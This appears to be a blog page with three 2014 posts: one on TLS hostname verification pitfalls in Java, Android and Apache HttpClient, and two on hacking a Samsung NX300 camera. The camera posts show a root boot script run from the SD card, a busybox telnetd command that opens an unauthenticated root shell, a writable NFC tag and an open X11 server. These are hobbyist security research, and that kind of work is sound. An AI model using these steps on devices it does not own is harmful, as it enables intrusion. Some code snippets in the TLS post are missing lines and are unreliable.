As the API designers realized that users of the raw SSLSocket might fall into a certificate verification trap set up by their API, they added a well-buried warning into the JSSE reference guide for Java 5, which I am sure you have read multiple times (or at least printed it and put it under your pillow):

IMPORTANT NOTE: When using raw SSLSockets/SSLEngines you should always check the peer's credentials before sending any data. The SSLSocket/SSLEngine classes do not automatically verify, for example, that the hostname in a URL matches the hostname in the peer's credentials. An application could be exploited with URL spoofing if the hostname is not verified.

Of course, URLs are only a thing in HTTPS, but you get the point... provided that you actually have read the reference guide... up to this place. If you only read the SSLSocket marketing reference article, and thought that you are safe because it does not mention any of the pitfalls: shame on you!

And even if you did read the warning, there is no hint about how to implement the peer credentials checks. There is no API class that would perform this tedious and error-prone task, and implementing it yourself requires a Ph.D. degree in rocket surgery, as well as deep knowledge of some related Internet standardsx.

x Side note: even if you do not believe SSL conspiracy theories, or theories confirmed facts about the deliberate manipulation of Internet standards by NSA and GCHQ, there is one prominent example of how the implementation of security mechanisms can be aggravated by adding complexity - the title of RFC 6125: "Representation and Verification of Domain-Based Application Service Identity within Internet Public Key Infrastructure Using X.509 (PKIX) Certificates in the Context of Transport Layer Security (TLS)".

Apache HttpClient

The Apache HttpClient library is a full-featured HTTP client written in pure Java, adding flexibility and functionality in comparison to the default HTTP implementation.

The Apache library developers came up with their own API interface for hostname verification, X509HostnameVerifier, that also happens to incorporate Java's HostnameVerifier interface. The new methods added by Apache are expected to throw SSLException when verification fails, while the old method still returns true or false, of course. It is hard to tell if this interface mixing is adding confusion, or reducing it. One way or the other, it results in the appropriate glue code:

public final boolean verify(String host, SSLSession session) {
    try {
        Certificate[] certs = session.getPeerCertificates();
        X509Certificate x509 = (X509Certificate) certs[0];
        verify(host, x509);
        return true;
    catch(SSLException e) {
        return false;

Based on that interface, AllowAllHostnameVerifier, BrowserCompatHostnameVerifier, and StrictHostnameVerifier were created, which can actually be plugged into anything expecting a plain HostnameVerifier. The latter two also actually perform hostname verification, as opposed to the default verifier in Java, so they can be used wherever appropriate. Their difference is:

The only difference between BROWSER_COMPATIBLE and STRICT is that a wildcard (such as "*") with BROWSER_COMPATIBLE matches all subdomains, including "".

If you can make use of Apache's HttpClient library, just plug in one of these verifiers and have a happy life:

sslSocket = ...;
HostnameVerifier verifier = new StrictHostnameVerifier();
if (!verifier.verify(serviceName, sslSocket.getSession())) {
    throw new CertificateException("Server failed to authenticate as " + serviceName);
// NOW you can send and receive data!


Android's designers must have been well aware of the shortcomings of the Java implementation, and the problems that an application developer might encounter when testing and debugging. They created the SSLCertificateSocketFactory class, which makes a developer's life really easy:

  1. It is available on all Android devices, starting with API level 1.

  2. It comes with appropriate warnings about its security parameters and limitations:

    Most SSLSocketFactory implementations do not verify the server's identity, allowing man-in-the-middle attacks. This implementation does check the server's certificate hostname, but only for createSocket variants that specify a hostname. When using methods that use InetAddress or which return an unconnected socket, you MUST verify the server's identity yourself to ensure a secure connection.

  3. It provides developers with two easy ways to disable all security checks for testing purposes: a) a static getInsecure() method (as of API level 8), and b)

    On development devices, "setprop socket.relaxsslcheck yes" bypasses all SSL certificate and hostname checks for testing purposes. This setting requires root access.

  4. Uses of the insecure instance are logged via adb:

    Bypassing SSL security checks at caller's request

    Or, when the system property is set:

    *** BYPASSING SSL SECURITY CHECKS (socket.relaxsslcheck=yes) ***

Some time in 2013, a training article about Security with HTTPS and SSL was added, which also features its own section for "Warnings About Using SSLSocket Directly", once again explicitly warning the developer:

Caution: SSLSocket does not perform hostname verification. It is up the your app to do its own hostname verification, preferably by calling getDefaultHostnameVerifier() with the expected hostname. Further beware that HostnameVerifier.verify() doesn't throw an exception on error but instead returns a boolean result that you must explicitly check.

Typos aside, this is very true advice. The article also covers other common SSL/TLS related problems like certificate chaining, self-signed certs and SNI. A must read! The fact that it does not mention the SSLCertificateSocketFactory is only a little snag.

Java 1.7+

As of Java 1.7, there is a new abstract class X509ExtendedTrustManager that finally unifies the two sides of certificate verification:

Extensions to the X509TrustManager interface to support SSL/TLS connection sensitive trust management.

To prevent man-in-the-middle attacks, hostname checks can be done to verify that the hostname in an end-entity certificate matches the targeted hostname. TLS does not require such checks, but some protocols over TLS (such as HTTPS) do. In earlier versions of the JDK, the certificate chain checks were done at the SSL/TLS layer, and the hostname verification checks were done at the layer over TLS. This class allows for the checking to be done during a single call to this class.

This class extends the checkServerTrusted and checkClientTrusted methods with an additional parameter for the socket reference, allowing the TrustManager to obtain the hostname that was used for the connection, thus making it possible to actually verify that hostname.

To retrofit this into the old X509TrustManager interface, all instances of X509TrustManager are internally wrapped into an AbstractTrustManagerWrapper that performs hostname verification according to the socket's SSLParameters. All this happens transparently, all you need to do is to initialize your socket with the hostname and then set the right params:

SSLParameters p = sslSocket.getSSLParameters();

If you do not set the endpoint identification algorithm, the socket will behave in the same way as in earlier versions of Java, accepting any valid certificate.

However, if you do run the above code, the certificate will be checked against the IP address or hostname that you are connecting to. If the service you are using employs DNS SRV, the hostname (the actual machine you are connecting to, e.g. "") might differ from the service name (what the user entered, like ""). However, the certificate will be issued for the service name, so the verification will fail. As such protocols are most often combined with STARTTLS, you will need to wrap your SSLSocket around your plain Socket, for which you can use the following code:

sslSocket = sslContext.getSocketFactory().createSocket(
        serviceName, /**< set your service name here */
// set the socket parameters here!

API Confusion Conclusion

To summarize the different "platforms":

  • If you are on Java 1.6 or earlier, you are screwed!
  • If you have Android, use SSLCertificateSocketFactory and be happy.
  • If you have Apache HttpClient, add a StrictHostnameVerifier.verify() call right after you connect your socket, and check its return value!
  • If you are on Java 1.7 or newer, do not forget to set the right SSLParameters, or you might still be screwed.

Java SSL In the Literature

There is a large amount of good and bad advice out there, you just need to be a farmer security expert to separate the wheat from the chaff.

Negative Examples

The most expensive advice is free advice. And the Internet is full of it. First, there is code to let Java trust all certificates, because self-signed certificates are a subset of all certificates, obviously. Then, we have a software engineer deliberately disable certificate validation, because all these security exceptions only get into our way. Even after the Snowden revelations, recipes for disabling SSL certificate validation are still written. The suggestions are all very similar, and all pretty bad.

Admittedly, an encrypted but unvalidated connection is still a little bit better than a plaintext connection. However, with the advent of free WiFi networks and SSL MitM software, everybody with a little energy can invade your "secure" connections, which you use to transmit really sensitive information. The effect of this can reach from funny over embarassing and up to life-threatening, if you are a journalist in a crisis zone.

The personal favorite of the author is this SO question about avoiding the certificate warning message in yaxim, which is caused by MemorizingTrustManager. It is especially amusing how the server's domain name is left intact in the screenshot, whereas the certificate checksums and the self-signed indication are blackened.

Fortunately, the situation on StackOverflow has been improving over the years. Some time ago, you were overwhelmed with DO_NOT_VERIFY HostnameVerifiers and all-accepting DefaultTrustManagers, where the authors conveniently forgot to mention that their code turns the big red "security" switch to OFF.

The better answers on StackOverflow at least come with a warning or even suggest certificate pinning.

Positive Examples

In 2012, Kevin Locke has created a proper HostnameVerifier using the internal class which seems to exist in Java SE 6 and 7. This HostnameVerifier is used with AsyncHttpClient, but is suitable for other use-cases as well.

Fahl et al. have analyzed the sad state of SSL in Android apps in 2012. Their focus was on HTTPS, where they did find a massive amount of applications deliberately misconfigured to accept invalid or mismatching certificates (probably added during app development). In a 2013 followup, they have developed a mechanism to enable certificate checking and pinning according to special flags in the application manifest.

Will Sargent from Terse Systems has an excellent series of articles on everything TLS, with videos, examples and plentiful background information. ABSOLUTELY MUST SEE!

There is even an excellent StackOverflow answer by Bruno, outlining the proper hostname validation options with Java 7, Android and "other" Java platforms, in a very concise way.

Mitigation Possibilities

So you are an app developer, and you get this pesky CertificateException you could not care less about. What can you do to get rid of it, in a secure way? That depends on your situation.

Cloud-Connected App: Certificate Pinning

If your app is always connecting to known-in-advance servers under you control (like only your company's "cloud"), employ Certificate Pinning.

If you want a cheap and secure solution, create your own Certificate Authority (CA) (and guard its keys!), deploy its certificate as the only trusted CA in the app, and sign all your server keys with it. This approach provides you with the ultimate control over the whole security infrastructure, you do not need to pay certificate extortion fees to greedy CAs, and a compromised CA can not issue certificates that would allow to MitM your app. The only drawback is that you might not be as good as a commercial CA at guarding your CA keys, and these are the keys to your kingdom.

To implement the client side, you need to store the CA cert in a key file, which you can use to create an X509TrustManager that will only accept server certificates signed by your CA:

KeyStore ks = KeyStore.getInstance(KeyStore.getDefaultType());
ks.load(new FileInputStream(keyStoreFile), "keyStorePassword".toCharArray());
TrustManagerFactory tmf = TrustManagerFactory.getInstance("X509");
SSLContext sc = SSLContext.getInstance("TLS");
sc.init(null, tmf.getTrustManagers(), new;
// use 'sc' for your HttpsURLConnection / SSLSocketFactory / ...

If you rather prefer to trust the establishment (or if your servers are to be used by web browsers as well), you need to get all your server keys signed by an "official" Root CA. However, you can still store that single CA into your key file and use the above code. You just won't be able to switch to a different CA later on if they try to extort more money from you.

User-configurable Servers (a.k.a. "Private Cloud"): TOFU/POP

In the context of TLS, TOFU/POP is neither vegetarian music nor frozen food, but stands for "Trust on First Use / Persistence of Pseudonymity".

The idea behind TOFU/POP is that when you connect to a server for the first time, your client stores its certificate, and checks it on each subsequent connection. This is the same mechanism as used in SSH. If you had no evildoers between you and the server the first time, later MitM attempts will be discovered. OpenSSH displays the following on a key change:

Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.

In case you fell victim to a MitM attack the first time you connected, you will see the nasty warning as soon as the attacker goes away, and can start investigating. Your information will be compromised, but at least you will know it.

The problem with the TOFU approach is that it does not mix well with the PKI infrastructure model used in the TLS world: with TOFU, you create one key when the server is configured for the first time, and that key remains bound to the server forever (there is no concept of key revocation).

With PKI, you create a key and request a certificate, which is typically valid for one or two years. Before that certificate expires, you must request a new certificate (optionally using a new private key), and replace the expiring certificate on the server with the new one.

If you let an application "pin" the TLS certificate on first use, you are in for a surprise within the next year or two. If you "pin" the server public key, you must be aware that you will have to stick to that key (and renew certificates for it) forever. Of course you can create your own, self-signed, certificate with a ridiculously long expiration time, but this practice is frowned upon (for self-signing and long expiration times).

Currently, some ideas exist about how to combine PKI with TOFU, but the only sensible thing that an app can do is to give a shrug and ask the user.

Because asking the user is non-trivial from a background networking thread, the author has developed MemorizingTrustManager (MTM) for Android. MTM is a library that can be plugged into your apps' TLS connections, that leverages the system's ability for certificate and hostname verification, and asks the user if the system does not consider a given certificate/hostname combination as legitimate. Internally, MTM is using a key store where it collects all the certificates that the user has permanently accepted.


If you are developing a browser that is meant to support HTTPS, please stop here, get a security expert into your team, and only go on with her. This article has shown that using TLS is horribly hard even if you can leverage existing components to perform the actual verification of certificates and hostnames. Writing such checks in a browser-compliant way is far beyond the scope of this piece.



Besides of TOFU/POP, which is not yet ready for TLS primetime, there is an alternative approach to link the server name (in DNS) with the server identity (as represented by its TLS certificate): DNS-based Authentication of Named Entities (DANE).

With this approach, information about the server's TLS certificate can be added to the DNS database, in the form of different certificate constraint records:

  • (0) a CA constraint can require that the presented server certificate MUST be signed by the referenced CA public key, and that this CA must be a known Root CA.
  • (1) a service certificate constraint can define that the server MUST present the referenced certificate, and that certificate must be signed by a known Root CA.
  • (2) a trust anchor assertion is like a CA constraint, except it does not need to be a Root CA known to the client. This allows a server administrator to run their own CA.
  • (3) a domain issued certificate is analogous to a service certificate constraint, but like in (2), there is no need to involve a Root CA.

Multiple constraints can be specified to tighten the checks, encoded in TLSA records (for TLS association). TLSA records are always specific to a given server name and port. For example, to make a secure XMPP connection with "", first the XMPP SRV record (_xmpp-client._tcp) needs to be obtained:

$ host -t SRV has SRV record 0 0 5222

Then, the TLSA record(s) for must be obtained:

$ host -t TLSA has TLSA record 3 0 1 75E6A12CFE74A2230F3578D5E98C6F251AE2043EDEBA09F9D952A4C1 C317D81D

This record reads as: the server is using a domain issued certificate (3) with the full certificate (0) represented via its SHA-256 hash (1): 75:E6:A1:2C:FE:74:A2:23:0F:35:78:D5:E9:8C:6F:25:1A:E2:04:3E:DE:BA:09:F9:D9:52:A4:C1:C3:17:D8:1D.

And indeed, if we check the server certificate using openssl s_client, the SHA-256 hash does match:

Issuer: O=Root CA, OU=, CN=CA Cert Signing Authority/
    Not Before: Apr  8 07:25:35 2014 GMT
    Not After : Oct  5 07:25:35 2014 GMT
SHA256 Fingerprint=75:E6:A1:2C:FE:74:A2:23:0F:35:78:D5:E9:8C:6F:25:1A:E2:04:3E:DE:BA:09:F9:D9:52:A4:C1:C3:17:D8:1D

Of course, this information can only be relied upon if the DNS records are secured by DNSSEC. And DNSSEC can be abused by the same entities that already can manipulate Root CAs and perform large-scale Man-in-the-Middle attacks. However, this kind of attack is made significantly harder: while a typical Root CA list contains hundreds of entries, with an unknown number of intermediate CAs each, and it is sufficient to compromise any one of them to screw you, with DNSSEC, the attacker needs to obtain the keys to your domain (, to your top-level domain (.net) or the master root keys (.). In addition to that improvement, another benefit of DANE is that server operators can replace (paid) Root CA services with (cheaper/free) DNS records.

However, there is a long way until DANE can be used in Java. Java's own DNS code is very limited (no SRV support, TLSA - what are you dreaming of?) The dnsjava library claims to provide partial DNSSEC verification, there is the unmaintained DNSSEC4j and the GSoC work-in-progress dnssecjava. All that remains is for somebody to step up and implement a DANETrustManager based on one of these components.


Internet security is hard. Let's go bake some cookies!

Comments on HN

Posted 2014-08-05 19:52:00 Tags:

This is the second post in a series covering the Samsung NX300 "Smart" Camera. In the first post, we have analyzed how the camera is interacting with the outside world using NFC and WiFi. In this post, we will have a deeper look at the operating system running on the camera, execute some code and open a remote root shell. This process can be applied (with some adaptations) to different networked consumer electronics, including home routers, NAS boxes and Smart TVs. The third post will leveage that knowledge to add functionality.

Firmware: Looking for Loopholes

Experience shows that most firmware images provide an easy way to run a user-provided shell script on boot. This feature is often added by the "software engineers" during development, but it boils down to a local root backdoor. On a camera, the SD card would be a good place to search. Other devices might execute code from an USB flash drive or the built-in hard disk.

Usually, we have to start with the firmware update file (nx300.bin from this 241MB ZIP in our case), run binwalk on it, extract and mount the root file system and have our fun. In this case, however, the source archive from Samsung's OSS Release Center contains an unpacked root file system tree in TIZEN/project/NX300/image/rootfs, so we just examine that:

georg@megavolt:TIZEN/project/NX300/image/rootfs$ ls -l
total 72
drwxr-xr-x  4 4096 Oct 16  2013 bin/
drwxr-xr-x  3 4096 Oct 16  2013 data/
drwxr-xr-x  3 4096 Oct 16  2013 dev/
drwxr-xr-x 38 4096 Oct 16  2013 etc/
drwxr-xr-x  9 4096 Oct 16  2013 lib/
-rw-r--r--  1  203 Oct 16  2013 make_image.log
drwxr-xr-x  8 4096 Oct 16  2013 mnt/
drwxr-xr-x  3 4096 Oct 16  2013 network/
drwxr-xr-x 16 4096 Oct 16  2013 opt/
drwxr-xr-x  2 4096 Oct 16  2013 proc/
lrwxrwxrwx  1   13 Oct 16  2013 root -> opt/home/root/
drwxr-xr-x  2 4096 Oct 16  2013 sbin/
lrwxrwxrwx  1    8 Oct 16  2013 sdcard -> /mnt/mmc
drwxr-xr-x  2 4096 Oct 16  2013 srv/
drwxr-xr-x  2 4096 Oct 16  2013 sys/
drwxr-xr-x  2 4096 Oct 16  2013 tmp/
drwxr-xr-x 16 4096 Oct 16  2013 usr/
drwxr-xr-x 13 4096 Oct 16  2013 var/

make_image.log sounds like somebody forgot to clean up before shipping (this file is actually contained on the camera):

SBS logging begin
Wed Oct 16 14:27:21 KST 2013

WARNING: setting root UBIFS inode UID=GID=0 (root) and permissions to u+rwx,go+rx; use --squash-rino-perm or --nosquash-rino-perm to suppress this warning

If we can believe the /sdcard symlink, the SD card is mounted at /mnt/mmc. Usually, there are some scripts and tools referencing the directory, and we should start with them:

georg@megavolt:TIZEN/project/NX300/image/rootfs$ grep /mnt/mmc -r .
./etc/fstab:/dev/mmcblk0    /mnt/mmc        exfat   noauto,user,umask=1000 0 0
./etc/fstab:/dev/mmcblk0p1  /mnt/mmc        exfat   noauto,user,umask=1000 0 0
./usr/sbin/ /oldroot/mnt/mmc
./usr/sbin/rcS.pivot:   mkdir -p /mnt/mmc
./usr/sbin/rcS.pivot:       mount -t vfat -o noatime,nodiratime $card_path /mnt/mmc
./usr/bin/    mount -t vfat /dev/mmcblk0 /mnt/mmc
./usr/bin/    mount -t vfat /dev/mmcblk0p1 /mnt/mmc
./usr/bin/ -t vfat /dev/mmcblk0p1 /mnt/mmc   
./usr/bin/ /mnt/mmc -name "*$1*.deb" -exec dpkg -i {} \; 2> /dev/null
./usr/bin/ -t vfat /dev/mmcblk0p1 /mnt/mmc
./usr/bin/ /mnt/mmc
./usr/bin/   nr_mnt_dev=`/usr/bin/stat -c %d /mnt/mmc` #/opt/storage
./usr/bin/       umount /mnt/mmc 2> /dev/null
./usr/bin/           /bin/mount -t vfat /dev/mmcblk${i}p1 /mnt/mmc -o uid=0,gid=0,dmask=0000,fmask=0000,iocharset=iso8859-1,utf8,shortname=mixed
./usr/bin/               /bin/mount -t vfat /dev/mmcblk${i} /mnt/mmc -o uid=0,gid=0,dmask=0000,fmask=0000,iocharset=iso8859-1,utf8,shortname=mixed
[ stripped a bunch of binary matches in /usr/bin and /usr/lib ]

What we have here are some usual Linux boot-up configuration files (fstab, rcS.pivot,, a very interesting script that installs any Debian packages from the SD card (, and ~50 shared libraries and executable binaries with the /mnt/mmc string hardcoded inside.

Package Installer Script

Let us have a look at first:

#! /bin/sh

echo $1
if [ "$#" = "2" ]
    if [ "$2" = "0" ]
    echo -e "mount mmcblk0.."
    mount -t vfat /dev/mmcblk0 /mnt/mmc
    echo -e "mount mmcblk0p1..."
    mount -t vfat /dev/mmcblk0p1 /mnt/mmc
echo -e "mount mmcblk0p1..."
mount -t vfat /dev/mmcblk0p1 /mnt/mmc   

find /mnt/mmc -name "*$1*.deb" -exec dpkg -i {} \; 2> /dev/null

echo -e "sync...."

This is a shell script that takes one or two arguments. The first one is the package name to look for (the find command will find and install all .deb files containing the first argument in their name). The second argument is used to mount the correct partition of the SD card. Surely we can use this script to install dropbear, gcc or moon-buggy. Now we only need to figure out how (or from where) this script is run:

georg@megavolt:TIZEN/project/NX300/image/rootfs$ grep -r .

Whoops. There are no references to it in the firmware. It was merely a red herring, and we need to find another way in.

The Magic Binary Blob

In /usr/bin, the most interesting file is di-camera-app-nx300, making references to /mnt/mmc/Demo/NX300_Demo.mp4, /mnt/mmc/SYSTEM/Device.xml and a bunch of WAV files in /mnt/mmc/sounds/ that seem to correspond to UI actions (up, down, ..., delete, ev, wifi).

This is obviously the magic binary blob controlling the really interesting functions (like the UI, the shutter, and the image processor). Most consumer electronics branded as "Open Source" contain some kind of Linux runtime which is only used to execute one large binary. That binary in turn encloses all the things you want to tinker with, but it is not provided with source code, still leaving you at the mercy of the manufacturer.

As expected, this program comes out of nowhere. There are traces of the di-camera-app-nx300 Debian package (version 0.2.387) being installed:

Package: di-camera-app-nx300
Status: install ok installed
Priority: extra
Section: misc
Installed-Size: 87188
Maintainer: Sookyoung Maeng <[snip]>, Jeounggon Yoo <[snip]>
Architecture: armel
Source: di-camera-app
Version: 0.2.387
Depends: libappcore-common-0, libappcore-efl-0, libaul-1, libbundle-0, libc6 (>= 2.4),
    libdevman-0, libdlog-0, libecore, libecore-evas, libecore-file, libecore-input,
    libecore-x, libedje (>=, libeina (>=,
    libelm, libevas (>=, libgcc1 (>= 1:4.4.0),
    libglib2.0-0 (>= 2.12.0), libmm-camcorder, libmm-player, libmm-sound-0,
    libmm-utility, libnetwork-0, libnl2 (>= 2.0), libslp-pm-0, libslp-utilx-0,
    libstdc++6 (>= 4.5), libvconf-0, libwifi-wolf-client, libx11-6,
    libxrandr2 (>= 2:1.2.0), libxtst6, prefman, libproduction-mode,
    libfilelistmanagement, libmm-common, libmm-photo, libasl, libdcm,
    libcapture-fw-slpcam-nx300, libvideo-player-ext-engine, libhibernation-slpcam-0,
    sys-mmap-manager, libstorage-manager, libstrobe, libdustreduction, libmm-slideshow,
    di-sensor, libdi-network-dlna-api, libproduction-commands, d4library,
Description: Digital Imaging inhouse application for nx300

So this package is created from di-camera-app, which does not exist either, except "inhouse". Thank you Samsung for spoiling the fun... :-(

Besides of some start/stop scripts, the only other interesting reference to this magic binary blob is in TIZEN/build/, which looks like a mixture of installation and startup script:


cp -f *.so /usr/lib
cp -f di-camera-app-nx300 /usr/bin

sleep 1
cd /
startx; di-camera-app &

(Because with only one sync, you can never know, and two might still not be enough if you must be 300% sure the data has been written).

The camera app is accompanied by another magic binary blob for WiFi, smart-wifi-app-nx300 (Samsung should get an award for creative file names). However, there are no hints at possible code execution in either program, so we need to dig even deeper.

Searching Shared Libraries

The situation in /usr/lib is different, though. We can run strings on the files that mention the SD card mount point (limiting the output to the relevant lines):

georg@megavolt:TIZEN/project/NX300/image/rootfs$ for f in `grep -l /mnt/mmc *.so` ; do \
                echo "--- $f" ; strings $f | grep /mnt/mmc; done
/usr/bin/iozone -A -s 40m -U /mnt/mmc -f /mnt/mmc/test -e > /tmp/card_result.txt
cp /tmp/card_result.txt /mnt/mmc

Okay, this is starting to get hot! /mnt/mmc/ and /mnt/mmc/ are exactly what we have been looking for. We need to try one of them and see what happens!

To test our theory, we need to mount the camera via USB, and create the following file in its root directory (Windows users watch out, the file needs to have Unix linebreaks!):

date >> $LOG
id >> $LOG
echo "$PATH" >> $LOG
ps axfu >> $LOG
mount >> $LOG

Now we need to unmount the camera, turn it off and on again, wait some seconds, mount it, and check if we got lucky. Let's see... autoexec.log is there! Jackpot! Now we can analyze its contents, piece by piece:

Fri May  9 06:25:20 UTC 2014
uid=0(root) gid=0(root)

This output was just generated, it was running as root (yeah!), and the path looks rather boring.

[stripped boring kernel threads and some columns]
  1    2988    52 Ss    init      
139   11460  1348 S     /usr/bin/system_server
144    2652   188 Ss    dbus-daemon --system
181    3416   772 Ss    /usr/bin/power_manager
232   12268  4608 S<s+  /usr/bin/Xorg :0 -logfile /opt/var/log/Xorg.0.log -ac -noreset \
    -r +accessx 0 -config /usr/etc/X11/xorg.conf -configdir /usr/etc/X11/xorg.conf.d
243    2988    76 Ss    init      
244    2988    56 Ss    init      
245    2988    60 Ss+   init      
246    2988    56 Ss+   init      
247    2988     8 S     sh /usr/etc/X11/xinitrc
256   20200  2336 S      \_ /usr/bin/enlightenment -profile samsung \
254   19876     8 S     /usr/bin/launchpad_preloading_preinitializing_daemon
255   12648   816 S     /usr/bin/ac_daemon
259    3600     8 S     dbus-launch --exit-with-session /usr/bin/enlightenment -profile samsung \
260    2652     8 Ss    /usr/bin/dbus-daemon --fork --print-pid 5 --print-address 7 --session
267  690688 34760 Ssl   di-camera-app-nx300
404    2988   520 S      \_ sh -c /mnt/mmc/
405    2988   552 S          \_ /bin/sh /mnt/mmc/
408    2860   996 R              \_ ps axfu

Our script is executed by di-camera-app-nx300, there is enlightenment and dbus running, and i-really-know-what-i-am-doing-and-accept-full-responsibility-for-it.

The mount point list looks pretty standard as well for an embedded device, using UBIFS for flash memory and the exfat driver for the SD card:

rootfs on / type rootfs (rw)
ubi0!rootdir on / type ubifs (ro,relatime,bulk_read,no_chk_data_crc)
devtmpfs on /dev type devtmpfs (rw,relatime,size=47096k,nr_inodes=11774,mode=755)
none on /proc type proc (rw,relatime)
tmpfs on /tmp type tmpfs (rw,relatime)
tmpfs on /var/run type tmpfs (rw,relatime)
tmpfs on /var/lock type tmpfs (rw,relatime)
tmpfs on /var/tmp type tmpfs (rw,relatime)
tmpfs on /var/backups type tmpfs (rw,relatime)
tmpfs on /var/cache type tmpfs (rw,relatime)
tmpfs on /var/local type tmpfs (rw,relatime)
tmpfs on /var/log type tmpfs (rw,relatime)
tmpfs on /var/mail type tmpfs (rw,relatime)
tmpfs on /var/opt type tmpfs (rw,relatime)
tmpfs on /var/spool type tmpfs (rw,relatime)
tmpfs on /opt/var/log type tmpfs (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
/dev/ubi2_0 on /mnt/ubi2 type ubifs (ro,noatime,nodiratime,bulk_read,no_chk_data_crc)
/dev/ubi1_0 on /mnt/ubi1 type ubifs (rw,noatime,nodiratime,bulk_read,no_chk_data_crc)
/dev/mmcblk0 on /mnt/mmc type exfat (rw,nosuid,nodev,noatime,nodiratime,uid=5000,gid=6,fmask=0022,

Remote Access

The camera is not connected to your WiFi network by default, you have to launch one of the WiFi apps first. The most reliable one for experimenting in your (protected) home network is the Email app. After you launch it, the camera looks for WiFi networks (configure your own one here), and stays connected for a long time, keeping the X server (and anything you run via open.

After tinkering around with a static dropbear binary downloaded from the Internets (and binary-patching the references to dropbear_rsa_host_key and authorized_keys), I ran into a really silly problem:

[443] May 09 12:00:45 user 'root' has blank password, rejected

Running a Telnet Server

Around the same time, I realized one thing that I should have checked first:

lrwxrwxrwx    1    17 May 22  2013 /usr/sbin/telnetd -> ../../bin/busybox

Our firmware comes with busybox, and busybox comes with telnetd - an easy to deploy remote login service. After the realization settled, the first attempt looked like we almost did it:

georg@megavolt:~$ telnet nx300
Connected to nx300.local.
Escape character is '^]'.
Connection closed by foreign host.

georg@megavolt:~$ telnet nx300
telnet: Unable to connect to remote host: Connection refused

Wow, the telnet port was open, something was running, but we crashed it! Another two mount-edit-restart-mount cycles later, the issue was clear:

telnetd: can't find free pty

Fortunately, the solution is documented. Now we can log into the camera for sure?

georg@megavolt:~$ telnet nx300
Connected to nx300.local.
Escape character is '^]'.

*                 SAMSUNG LINUX PLATFORM                   *

nx300 login: root
Login incorrect

Damn, Samsung! Why no login? Maybe we can circumvent this in some way? Does the busybox telnetd help provide any hints?

    -l LOGIN        Exec LOGIN on connect

Maybe we can replace the evil password-demanding login command with... a shell? Let us adapt our SD card script to what we have gathered:


mkdir -p /dev/pts
mount -t devpts none /dev/pts

telnetd -l /bin/bash -F > /mnt/mmc/telnetd.log 2>&1 &

Another mount-edit-restart cycle, and we are in:

georg@megavolt:~$ telnet nx300
Connected to nx300.local.
Escape character is '^]'.

*                 SAMSUNG LINUX PLATFORM                   *

nx300:/# cat /proc/cpuinfo
Processor       : ARMv7 Processor rev 8 (v7l)
BogoMIPS        : 1395.91
Features        : swp half thumb fastmult vfp edsp neon vfpv3 tls 
CPU implementer : 0x41
CPU architecture: 7
CPU variant     : 0x2
CPU part        : 0xc09
CPU revision    : 8

Hardware        : Samsung-DRIMeIV-NX300
Revision        : 0000
Serial          : 0000000000000000
nx300:/# free
         total       used       free     shared    buffers     cached
Mem:        512092     500600      11492          0        132      41700
-/+ buffers/cache:     458768      53324
Swap:        30716       8084      22632
nx300:/# df -h /
Filesystem                Size      Used Available Use% Mounted on
ubi0!rootdir            352.5M    290.8M     61.6M  83% /
nx300:/# ls -al /opt/sd0/DCIM/100PHOTO/
total 1584
drwxr-xr-x    2 root     root           520 May 22  2013 .
drwxr-xr-x    3 root     root           232 May 22  2013 ..
-rwxr-xr-x    1 root     root        394775 May 22  2013 SAM_0015.JPG
-rwxr-xr-x    1 root     root        335668 May 22  2013 SAM_0016.JPG   [Obama was here]
-rwxr-xr-x    1 root     root        357591 May 22  2013 SAM_0017.JPG
-rwxr-xr-x    1 root     root        291493 May 22  2013 SAM_0018.JPG
-rwxr-xr-x    1 root     root        232470 May 22  2013 SAM_0019.JPG

Congratulations, you have gained network access to yet another Linux appliance! From here, you should be able to perform anything you want on the camera, except from the interesting things closed in the Samsung binaries.

Comments on HN

Full series:

Posted 2014-05-12 18:05:26 Tags:

The Samsung NX300 smart camera is a middle-class mirrorless camera with NFC and WiFi connectivity. You can connect it with your local WiFi network to upload directly to cloud services, share pictures via DLNA or obtain remote access from your smartphone. For the latter, the camera provides the Remote Viewfinder and MobileLink modes where it creates an unencrypted access point with wide-open access to its X server and any data which you would expect only to be available to your smartphone.

Because hardware engineers suck at software security, nothing else was to be expected. Nevertheless, the following will show how badly they suck, if only for documentation purposes.

This post is only covering the network connectivity of the NX300. Read the follow-up posts for getting a root shell and adding features to the camera. The smartphone app deserves some attention as well. Feel free to do your own research and post it to the project wiki.

The findings in this blog posts are based on firmware version 1.31.


The NFC "connectivity" is an NTAG203 created by NXP, which is pre-programmed with an NDEF message to download and launch the (horribly designed) Samsung SMART CAMERA App from Google Play, and to inform the app about the access point name provided by this individual camera:

Type: MIME: application/com.samsungimaging.connectionmanager
Payload: AP_SSC_NX300_0-XX:XX:XX

Payload: com.samsungimaging.connectionmanager

The tag is writable, so a malicious user can easily "hack" your camera by rewriting its tag to download some evil app, or to open nasty links in your web browser, merely by touching it with an NFC-enabled smartphone. This was confirmed by replacing the tag content with an URL.

The deployed tag supports permanent write-locking, so if you know a prankster nerd, you might end up with a camera stuck redirecting you to a hardcore porn site.

WiFi Networking

You can configure the NX300 to enter your WiFi network, it will behave like a regular client with some open services, like DLNA. Let us see what exactly is offered by performing a port scan:

megavolt:~# nmap -sS -O nx300

Starting Nmap 6.25 ( ) at 2013-11-21 22:37 CET
Nmap scan report for nx300.local (
Host is up (0.0089s latency).
Not shown: 999 closed ports
6000/tcp open  X11
MAC Address: A0:21:95:**:**:** (Unknown)
No exact OS matches for host (If you know what OS is running on it, see ).

This scan was performed while the "E-Mail" application was open. In AllShare Play and MobileLink modes, 7676/tcp is opened in addition. Further, in Remote Viewfinder mode, the camera also opens 7679/tcp.

X Server

Wait, what? X11 as an open service? Could that be true? For sure it is access-locked via TCP to prevent abuse?

georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts

georg@megavolt:~$ DISPLAY=nx300:0 xrandr
Screen 0: minimum 320 x 200, current 480 x 800, maximum 4480 x 4096
LVDS1 connected 480x800+0+0 (normal left inverted right x axis y axis) 480mm x 800mm
   480x800        60.0*+
HDMI1 disconnected (normal left inverted right x axis y axis)

georg@megavolt:~$ for i in $(xdotool search '.') ; do xdotool getwindowname $i ; done
Defaulting to search window name, class, and classname
Enlightenment Background
Enlightenment Black Zone (0)

Enlightenment Frame
Enlightenment Frame

Nope! This is really an unprotected X server! It is running Enlightenment! And we can even run apps on it! But besides displaying stuff on the camera the fun seems very limited:

NX300 xteddy

X11 Key Bindings

